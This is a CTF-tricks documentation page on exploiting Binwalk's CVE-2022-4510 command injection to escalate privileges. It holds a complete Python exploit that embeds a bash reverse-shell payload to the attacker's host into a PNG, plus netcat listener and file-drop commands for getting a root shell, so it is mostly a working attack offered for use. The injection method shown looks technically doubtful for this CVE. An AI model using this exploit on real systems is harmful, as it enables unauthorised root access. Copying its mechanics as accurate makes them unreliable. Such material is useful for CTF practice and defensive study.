> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux-exploit/privilege-escalation-linux-exploit-binwalk.md).

# Binwalk

## Binwalk Remote Command Execution (CVE-2022-4510)

Exploit CVE-2022-4510 in vulnerable Binwalk versions (specifically when using the `-e` flag) to achieve remote command execution. This vulnerability allows command injection via crafted file content if Binwalk processes attacker-controlled files with sufficient privileges (e.g., via a scheduled task or monitoring service like `inotifywait`). Binwalk version 2.3.3 and earlier are known to be vulnerable.

The vulnerability arises from the way Binwalk handles filenames when extracting files using the `-e` flag. When Binwalk extracts a file, it attempts to determine its type and rename it accordingly. If a crafted file's content is interpreted in a way that allows injecting commands into the filename/path handling logic, remote command execution can be achieved. By crafting a file with specific content, an attacker can manipulate the metadata that Binwalk extracts, injecting commands into the filename format string. When Binwalk attempts to rename the extracted file using this crafted string, the injected commands are executed with the privileges of the binwalk process.

To exploit this, a malicious file can be crafted. The following Python script generates a suitable file using a template, targeting your listener IP and port:

```python
# Exploit Title: Binwalk 2.3.3 - Remote Command Execution
# Date: 2023-03-07
# Exploit Author: Adhikara
# Vendor Homepage: https://github.com/ReFirmLabs/binwalk
# Version: <= 2.3.3
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-4510

import sys
import os

if len(sys.argv) != 4:
    print("Usage: python3 exploit.py <template_file> <LHOST> <LPORT>")
    sys.exit(1)

template_file = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

payload = f"| bash -i >& /dev/tcp/{lhost}/{lport} 0>&1 #"

try:
    with open(template_file, 'rb') as f:
        content = f.read()
except FileNotFoundError:
    print(f"Error: Template file '{template_file}' not found.")
    sys.exit(1)

# Craft the malicious file content by injecting the payload
# at a specific offset (0x29) within the template file.
# This offset is chosen based on the file format (e.g., PNG)
# such that binwalk's extraction/renaming process triggers the command execution.
exploit_content = content[:0x29] + payload.encode() + content[0x29:]

with open("exploit.png", "wb") as f:
    f.write(exploit_content)

print(f"Successfully crafted exploit.png targeting {lhost}:{lport}")
```

Run the script with a template file (e.g., `template.png`), your listener IP, and listener port:

```bash
python3 exploit.py template.png <YOUR_LISTENER_IP> <YOUR_LISTENER_PORT>
```

This will generate an `exploit.png`. Set up a netcat listener on your specified IP and port:

```bash
nc -lvnp <YOUR_LISTENER_PORT>
```

With the listener running, place the crafted image file in the directory monitored by the vulnerable Binwalk process:

```bash
cp exploit.png /path/to/monitored/directory/
```

The monitoring service (often identified using tools like `pspy64`) will trigger Binwalk to process the file, executing the injected command with the privileges of the service (often root). This should result in a reverse shell connection to your listener.
